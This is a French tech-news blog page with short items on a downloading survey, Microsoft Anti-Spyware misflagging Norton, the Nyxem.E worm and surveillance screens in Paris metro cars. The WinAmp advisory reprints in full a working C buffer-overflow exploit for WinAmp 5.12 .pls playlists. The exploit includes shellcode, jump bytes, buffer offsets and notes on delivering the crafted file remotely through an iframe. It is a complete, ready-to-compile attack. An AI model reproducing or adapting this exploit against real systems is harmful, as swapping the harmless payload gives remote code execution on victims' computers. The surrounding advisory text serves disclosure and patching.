Selon une étude TNS-SOFRES, 17% des francais disent avoir téléchargé des videos ou de la musique sur Internet, contre 83% qui ne l'on pas fait.

Cette étude réalisée pour le groupe Casino et L'Hémicycle permet de mesurer l'ampleur des pratiques de téléchargement en France aujourd'hui.  Le téléchargement gratuit sur les réseaux P2P (Emule, Bittorrent...) l'emporte largement sur l'offre payante avec 14% des sondés contre seulement 5% d'usagers pour les réseaux payants.
En regardant de plus près les chiffres, on s'apercoit que ce sont principalement les jeunes (18-35 ans, la génération Internet) qui téléchargent. Au-delà de 50 ans, la pratique devient marginale. Rien d'étonnant, pour les retraités, l'ordinateur c'est surtout pour Internet. Le principal usage reste le courrier électronique, surfer sur les pages web, et un peu de traitement de texte. Les "jeunes" privilégient l'usage multimédia de leur PC. Ils l'utilisent comme une télévision, un magnétoscope, une chaine HIFI, etc.
Ce sont les ingénieurs (catégorie cadre 32%) et les techniciens (catégorie intermédiaire 26%) qui téléchargent le plus, les ouvriers représentants une part moindre (catégorie ouvrier 17%). Enfin ce sont les foyers les plus aisés qui téléchargent le plus (gratuitement ou non). Ce qui s'explique en parti a cause du cout d'acquisition d'un ordinateur et d'un accès Internet.
Le téléchargement payant est pratiqué par des cadres supérieurs en cours d'activité.

La derniere mise a jour de Microsoft Anti-Spyware, assimile Norton antivirus à PWS.Bancos.A, un troyen capable de voler des mots de passes.

Le logiciel conseille de déinstaller l'application. Si l'utilisateur s'exécute, Norton s'en trouvera corrompu et laissera le PC sans protection. Pire Norton ne pourra être relancer qu'au prix d'un nettoyage de la base de registre Windows. Une opération hors de portée de l'utilisateur normal d'un PC.

Plusieurs millions de PC équipés de Microsoft Anti-Spyware et Norton Antivirus doivent être actuellement sans protection.

Cette erreur de Microsoft Anti-Spyware (qui reste en version beta) pourrait se révéler catastrophique.
Qui va payer pour les dégats dans les systèmes d'informations ? Microsoft ou Symantec ?

Vous utilisez WinAmp comme lecteur multimédia par défaut. Vous l'utilisez pour écouter de la musique sur Internet. Attention, une faille critique a été identifié dans le module de gestion des playlists (fichier ".pls"). Cette faille de type buffer overflow peut être exploité a distance pour exécuter un code malicieux sur votre machine. Il suffit d'ouvrir une playlist piégée pour que le shellcode soit exécuté par WinAmp.
Les versions 5.12 et antérieures sont vulnérables. La version 5.13 corrige la faille.

Solution :
Mettez a jour votre WinAmp avec la version 5.13

Exploit :
Le code suivant prouve l'existence de la vulnérabilité. L'exécution de ce programme créera une playlist pour WinAmp (crafted.pls). Si cette playlist est chargé dans WinAmp (version =< 5.12), la calculatrice Windows est démarré dans le même temps !

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pls"

char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

// Harmless Calc.exe
char shellcode[] =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";


int main(int argc,char *argv[])
{
printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
printf("\nBug discovered & exploit coded by ATmaCA");
printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
printf("\nE-Mail: atmaca@icqmail.com");
printf("\nCredit to Kozan");

FILE *File;
char *pszBuffer;

if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memset(pszBuffer,0x90,BUF_LEN);
memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n");
return 1;
}

Un nouveau ver/virus circule sur l'internet : Nyxem.E. Rien d'innovant dans ce virus, il se propage par le courriels et les partages réseaux windows. L'internaute est incité a ouvrir la pièce jointe (le virus) en la présentant comme une image qui pourrait exiter la libido de la pauvre victime.

Le 3 février prochain le virus effacera tous les documents de type office (Word, Excel, Powerpoint, PDF...).  Préparer des sauvegardes préventives.
Il n'est pas garanti que la destruction des fichiers est lieu. Un autre virus (Sober) devait lui s'activer le 5 janvier, ne s'est jamais activer.

Le virus tente de désactiver les antivirus installés, aussi si votre antivirus ne fonctionne plus ou mal (nombreux messages d'erreur) utiliser l'outil de désinfection de Symantec : http://securityresponse.symantec.com/avcenter/FixBmalE.exe.

Le métro de "Total Recall" arrive en France.

Fin 2007 ligne 2, 5, et 9 de nouvelle rame de métro de la RATP feront leur apparition. Ces nouvelles voitures seront équipées de caméra de surveillance et d'écran pour diffuser des publicités aux voyageurs.
Pour avoir une idée de ce que sera ce nouveau métro, replongez-vous dans le film de Paul Verhoeven "Total Recall" (fiche film : http://www.scifi-universe.com/fiche_media.asp?media_id=22 ). Arnold Schwarzenegger alias Doug Quaid rentre de son travail en métro où il verra sur l'un des écrans publicitaire une annonce de la firme Total Recall.
Seize ans après, la télévision et ses publicités arrive dans notre métropolitain.